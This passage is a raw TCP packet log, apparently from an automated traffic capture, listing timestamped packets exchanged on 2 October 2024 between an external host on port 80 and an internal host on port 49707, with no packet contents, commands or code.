                                                              Oct 2, 2024 05:29:28.323518991 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323530912 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323543072 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323548079 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323548079 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323569059 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323632002 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323643923 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323653936 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323678017 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323717117 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323749065 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323760033 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323771000 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323781967 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323793888 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323811054 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323837996 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323887110 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323898077 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323909044 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323925018 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323940992 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323951006 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323962927 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323973894 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323986053 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323998928 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324039936 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324039936 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324039936 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324039936 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324204922 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324217081 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324227095 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324238062 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324246883 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324249029 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324259996 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324260950 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324331045 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324472904 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324482918 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324493885 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324505091 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324515104 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324526072 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324528933 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324528933 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324537039 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324547052 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324559927 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324570894 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324572086 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324572086 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324583054 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324592113 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324593067 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324603081 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324629068 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324676991 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324793100 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324805021 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324815035 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324826002 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324836969 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324847937 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324858904 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324871063 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324937105 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324947119 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.324949980 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324949980 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324949980 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.324949980 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.325004101 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.325077057 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325120926 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325133085 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325161934 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.325222969 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325234890 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325246096 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325257063 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325268030 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325289965 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.325289965 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.325309992 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.325372934 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325383902 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325395107 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325406075 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325417995 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325428963 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.325438023 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.325438023 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.325520992 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.367322922 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367361069 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367377996 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367394924 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367407084 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367418051 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367428064 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.367430925 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367450953 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367463112 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.367463112 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.367470026 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367487907 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367520094 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.367520094 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.367527008 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367537975 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367551088 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367618084 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.367621899 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367634058 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367705107 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.367784977 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367795944 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367808104 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.367839098 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.367839098 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.368035078 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368046045 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368057966 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368068933 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368079901 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368091106 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368102074 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368113041 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368132114 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368134975 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.368134975 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.368134975 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.368144035 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368155956 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368184090 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.368184090 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.368231058 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368242025 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368252039 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368263960 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368274927 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368320942 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368328094 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.368328094 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.368328094 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.368331909 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.368400097 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.409828901 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.409856081 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.409868002 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.409878969 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.409893036 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.409903049 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.409919977 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.409930944 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.409943104 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.409966946 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.409971952 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.409981966 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.409992933 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410005093 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410039902 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410054922 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410062075 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410074949 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410125017 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410135984 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410147905 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410147905 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410181999 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410181999 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410218000 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410228968 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410248995 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410329103 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410335064 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410345078 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410351038 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410367012 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410378933 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410387993 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410429955 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410442114 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410456896 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410464048 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410464048 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410464048 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410500050 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410536051 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410547972 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410558939 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410569906 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410579920 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410623074 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410660028 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410665989 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410676003 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410695076 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410706043 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410717010 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410729885 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410742044 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410747051 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410747051 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410754919 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410767078 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410785913 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410923004 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410933971 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410944939 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410955906 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410968065 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410973072 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.410980940 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.410995007 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.411030054 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.411061049 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411072969 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411083937 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411096096 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411107063 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411118984 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411153078 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.411153078 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.411153078 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.411343098 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411354065 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411365986 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411376953 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411381006 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.411392927 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411410093 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411412001 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.411422968 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411433935 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411437988 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.411446095 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411458015 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411470890 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.411478996 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411531925 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411560059 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.411560059 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.411856890 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411890984 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411900997 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.411919117 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.411999941 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.412009954 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.412022114 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.412030935 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.412033081 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.412045956 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.412111044 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.412122965 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.412126064 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.412126064 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.412133932 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.412158966 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.412164927 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.412177086 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.412183046 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.412206888 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.412206888 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.412229061 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.412287951 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.454566956 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454591990 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454605103 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454621077 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454632998 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454644918 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454657078 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454667091 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454678059 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454687119 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454698086 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454709053 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454727888 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.454767942 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454777956 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454790115 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454809904 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454824924 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454838991 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454850912 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454859972 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.454859972 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454859972 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.454859972 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.454859972 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.454921007 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454931021 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454941034 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454952002 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454961061 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454961061 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.454961061 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.454961061 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.454972029 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454982996 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455012083 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455012083 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455039024 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455049038 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455060005 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455087900 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455096960 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455110073 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455121040 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455137968 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455182076 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455288887 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455301046 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455312014 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455323935 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455334902 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455346107 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455348015 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455358982 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455369949 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455393076 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455404997 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455404997 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455404997 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455405951 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455523968 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.496680975 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496694088 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496700048 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496711969 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496716976 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496728897 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496735096 CEST804970745.90.89.123192.168.2.10
